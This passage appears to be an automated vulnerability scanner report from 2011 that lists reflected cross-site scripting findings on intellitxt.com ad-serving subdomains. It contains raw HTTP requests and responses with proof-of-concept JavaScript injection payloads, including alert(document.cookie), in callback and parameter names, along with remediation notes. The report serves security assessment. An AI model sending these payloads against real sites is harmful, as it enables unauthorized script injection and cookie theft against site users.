GET /v4/advert?ts=1298042588177&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&sid=0f813f309d5cacd41f37cc296f7d04b3&pvu=B5833CD53518442CBC5E30D5B26FA9D2&pvm=c94d0e979f8311611a6d3feb87776715&ipid=26010&cc=us&rcc=us®=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback86ef9b%3balert(1)//5afbc9e6ad4 HTTP/1.1 Host: pdastreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:22:44 GMT Age: 0 Connection: keep-alive Content-Length: 12665
(function(){var nh = new $iTXT.ui.Hook({value: "mobile",uid: "2A836D895EC14C72AC24C9D232D5A08E",uidh: "9327353bf3d66ede3e875d4ec30da6e6",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl. ...[SNIP]... return ad;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('Generic');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback86ef9b;alert(1)//5afbc9e6ad4();}catch(e){}
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb568%3balert(1)//5852d7bbed6 was submitted in the jscallback parameter. This input was echoed as eb568;alert(1)//5852d7bbed6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1298042578302&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&sid=0f813f309d5cacd41f37cc296f7d04b3&pvu=B5833CD53518442CBC5E30D5B26FA9D2&pvm=c94d0e979f8311611a6d3feb87776715&ipid=26010&cc=us&rcc=us®=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=41002&jsoncl=6073&ppc=-1&hn=38&chunkkey=26010:0f813f309d5cacd41f37cc296f7d04b3:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A6%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A7%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A8%2Cc%3A%22Listen%20as%20Kevin%20Remde%20and%20his%20guests%20discuss%20the%20productivity%20tools%20that%20business%20users%20expect...%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A9%2Cc%3A%22Internet.com's%20premiere%20site%20for%20mobile%20managers%20and%20IT%20professionals%20is%20where%20wireless%20meets%20business.%20Our%20expert%20analysis%20and%20tips%20will%20guide%20you%20in%20buying%2C%20deploying%2C%20securing%20an&chunk=0&total=7&jscallback=$iTXT.js.callback1eb568%3balert(1)//5852d7bbed6 HTTP/1.1 Host: pdastreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Fri, 18 Feb 2011 15:22:49 GMT Age: 0 Connection: keep-alive
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7c853%3balert(1)//91f488e00aa was submitted in the jscallback parameter. This input was echoed as 7c853;alert(1)//91f488e00aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042576928&pagecl=41002&fv=10&muid=&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&ipid=26010&jscallback=$iTXT.js.callback07c853%3balert(1)//91f488e00aa HTTP/1.1 Host: pdastreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:23:16 GMT Age: 0 Connection: keep-alive Content-Length: 19497
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback07c853;alert(1)//91f488e00aa({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
3.60. http://pdastreet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pdastreet.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba6a5"-alert(1)-"6765de298f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042576928&pagecl=41002&fv=10&muid=&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&ipid=26010&jscallback=$iTXT.js.callback0&ba6a5"-alert(1)-"6765de298f2=1 HTTP/1.1 Host: pdastreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:23:20 GMT Age: 0 Connection: keep-alive Content-Length: 19478
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... "POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","ba6a5"-alert(1)-"6765de298f2":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4\u003d1","rcc":"us","cc":"us"},null,60);var un ...[SNIP]...
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ac5ee%3balert(1)//e397277eba was submitted in the jscallback parameter. This input was echoed as ac5ee;alert(1)//e397277eba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110218152112&adid=0%2C0%2C0%2C0%2C0%2C0&cc=us&di=29608421%2C29608413%2C29608378%2C30073701%2C30019010%2C30073704&hk=1&ipid=26011&mh=5bbec50d8fe172507531204b6f39cc85&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=4cedcfaeb263b70d71df9c7c8e01740b&pvu=F8F9754A003A48FEB9B6ABE9370A1463&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=377%2C358%3B674%2C799%3B475%2C1087%3B555%2C1181%3B517%2C1383%3B332%2C2095%3B&prf=ll%3A1582%7Cintl%3A2807%7Cpreprochrome%3A3%7Cgetconchrome%3A104%7Ccontint%3A9658%7Ccontl%3A12573%7Cadvint%3A1492%7Cadvl%3A14065%7Ctl%3A14167&jscallback=$iTXT.js.callback9ac5ee%3balert(1)//e397277eba HTTP/1.1 Host: smartphonetoday.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:20:55 GMT; Path=/ Content-Type: text/javascript Content-Length: 64 Date: Fri, 18 Feb 2011 15:20:55 GMT Age: 0 Connection: keep-alive
3.62. http://smartphonetoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smartphonetoday.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9ed5'-alert(1)-'06b4bf80a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=26011&a9ed5'-alert(1)-'06b4bf80a8c=1 HTTP/1.1 Host: smartphonetoday.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVqvOwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:19:27 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVqvOwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:19:27 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:19:27 GMT Age: 0 Connection: keep-alive Content-Length: 10605
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... p://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218151927";})();$iTXT.js.serverUrl='http://smartphonetoday.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26011&a9ed5'-alert(1)-'06b4bf80a8c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b7268%3balert(1)//eac604c61a3 was submitted in the jscallback parameter. This input was echoed as b7268;alert(1)//eac604c61a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/advert?ts=1298042470709&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&sid=5bbec50d8fe172507531204b6f39cc85&pvu=F8F9754A003A48FEB9B6ABE9370A1463&pvm=4cedcfaeb263b70d71df9c7c8e01740b&ipid=26011&cc=us&rcc=us®=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback8b7268%3balert(1)//eac604c61a3 HTTP/1.1 Host: smartphonetoday.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:20:53 GMT Age: 0 Connection: keep-alive Content-Length: 12665
(function(){var nh = new $iTXT.ui.Hook({value: "mobile",uid: "09EBBEA915474367B32F83557F9A7F49",uidh: "9daf5377f0fb212ec92c7b0ce9b588ed",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl. ...[SNIP]... return ad;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('Generic');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback8b7268;alert(1)//eac604c61a3();}catch(e){}
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39e99%3balert(1)//26306191dc7 was submitted in the jscallback parameter. This input was echoed as 39e99;alert(1)//26306191dc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1298042461051&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&sid=5bbec50d8fe172507531204b6f39cc85&pvu=F8F9754A003A48FEB9B6ABE9370A1463&pvm=4cedcfaeb263b70d71df9c7c8e01740b&ipid=26011&cc=us&rcc=us®=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=61592&jsoncl=5886&ppc=-1&hn=37&chunkkey=26011:5bbec50d8fe172507531204b6f39cc85:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A6%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A7%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A8%2Cc%3A%22Internet.com's%20premiere%20site%20for%20mobile%20managers%20and%20IT%20professionals%20is%20where%20wireless%20meets%20business.%20Our%20expert%20analysis%20and%20tips%20will%20guide%20you%20in%20buying%2C%20deploying%2C%20securing%20and%20managing%20mobile%20technology%20in%20the%20enterprise.%20You'll%20find%20strategic%20analysis%2C%20best%20practices%2C%20news%2C%20buyer.s%20guides%20and%20practical%20advice%20on%20how%20to%20evaluate%20and%20support%20a%20wide%20range%20of%20devices%20in%20the%20workforce.%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D&chunk=0&total=7&jscallback=$iTXT.js.callback139e99%3balert(1)//26306191dc7 HTTP/1.1 Host: smartphonetoday.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Fri, 18 Feb 2011 15:21:02 GMT Age: 0 Connection: keep-alive
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3e2a3%3balert(1)//6d082f7d91e was submitted in the jscallback parameter. This input was echoed as 3e2a3;alert(1)//6d082f7d91e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042459718&pagecl=61592&fv=10&muid=&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&ipid=26011&jscallback=$iTXT.js.callback03e2a3%3balert(1)//6d082f7d91e HTTP/1.1 Host: smartphonetoday.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:21:35 GMT Age: 0 Connection: keep-alive Content-Length: 19277
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback03e2a3;alert(1)//6d082f7d91e({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
3.66. http://smartphonetoday.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smartphonetoday.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff44"-alert(1)-"2e3ab260276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298042459718&pagecl=61592&fv=10&muid=&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&ipid=26011&jscallback=$iTXT.js.callback0&cff44"-alert(1)-"2e3ab260276=1 HTTP/1.1 Host: smartphonetoday.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:21:40 GMT Age: 0 Connection: keep-alive Content-Length: 19258
